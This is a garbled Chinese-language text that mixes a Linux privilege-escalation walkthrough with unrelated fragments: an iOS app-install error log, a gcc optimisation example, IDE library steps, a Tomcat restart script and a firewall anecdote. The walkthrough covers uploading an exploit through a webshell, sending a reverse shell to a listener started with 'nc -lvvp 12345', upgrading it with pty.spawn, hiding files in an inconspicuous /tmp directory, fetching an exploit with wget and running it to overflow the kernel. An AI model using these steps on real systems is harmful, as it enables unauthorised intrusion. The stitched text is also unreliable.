Linux提權(quán)大致可分為,第三方軟件漏洞、本地信任特性、內(nèi)核溢出
找對(duì)應(yīng)的exp, 這里地址整理很齊全可以這里下
命令輸入pwd,這個(gè)命令是顯示當(dāng)前目錄,
先看能不能編譯 gcc -help
當(dāng)前目錄就是shell的目錄,我在shell上傳2.c
反彈shell 到外網(wǎng)自己機(jī)器的12345端口
上外網(wǎng)服務(wù)器 本地監(jiān)聽 nc -lvvp 12345
一般都能得到一個(gè)apache交互的shell 有時(shí)候又不行
這時(shí)候
/bin/sh/opt/tomcat/bin/shutdown.shsleep 1m/opt/tomcat/bin/startup.sh建立完畢以后,可以先測(cè)試一下這個(gè)腳本,看看腳本有沒有問題。
info: [debug] responding to client with error: {"status":33,"value":{"message":"a new session could not be created. (original error: command failed: /bin/sh -c ideviceinstaller -u 40b8b0acd5592cbae24d53ca3528d605ba3dbae7 -i com.sogou.map.app.map\n)","killed":false,"code":null,"signal":"sigsegv","cmd":"/bin/sh -c ideviceinstaller -u 40b8b0acd5592cbae24d53ca3528d605ba3dbae7 -i com.sogou.map.app.map","origvalue":"command failed: /bin/sh -c ideviceinstaller -u 40b8b0acd5592cbae24d53ca3528d605ba3dbae7 -i com.sogou.map.app.map\n"},"sessionid":null}。
之后通過fgets讀入”/bin/sh”時(shí),printf(“/bin/sh”)已經(jīng)相當(dāng)于system(“/bin/sh”),即可get shell。
pty.spawn("/bin/bash")‘。
cd /tmp 進(jìn)入tmp目錄
mkdir Papers 創(chuàng)建一個(gè)Papers的目錄 Papers不顯眼
cd Papers 進(jìn)入 Papers目錄
pwd 查看當(dāng)前目錄
然后命令輸入
wget 下載exp
}我們?cè)陂_啟優(yōu)化和未開啟優(yōu)化兩種情況下分別編譯執(zhí)行:$ gcc -std=c99 foo.c -o foo$ ./foo$ foo in foo.c$ gcc-std=c99 foo.c -o foo -o2$ ./foo$ foo in foo.c我們看到:無(wú)論哪種情況,我們都可以順利通過編譯,并且得到正確的執(zhí)行結(jié)果。
1、右鍵點(diǎn)擊工程,假設(shè)為a,選add group,假設(shè)為b,再將想生成lib的文件加入b group,假設(shè)文件是cc.c,必須要有cc.h。
不過,cc攻擊的攔截又是會(huì)將短時(shí)間內(nèi)大量訪問的ip視為攻擊,我查看日志發(fā)現(xiàn)很多訪問html文件的ip被攔截為cc攻擊,而根據(jù)一般常識(shí),攻擊者通常不會(huì)以html文件為cc攻擊對(duì)象,因此我懷疑可能是有人大量采集我網(wǎng)站內(nèi)容,短時(shí)間內(nèi)大量訪問,被防火墻標(biāo)記為cc攻擊從而攔截,不過這種誤判也不算壞事。
因?yàn)?require 某個(gè)文件等同于 “編譯 + 執(zhí)行” 這個(gè)文件。
chmod +x 2 //給2有執(zhí)行權(quán)限
./2 //執(zhí)行2, 溢出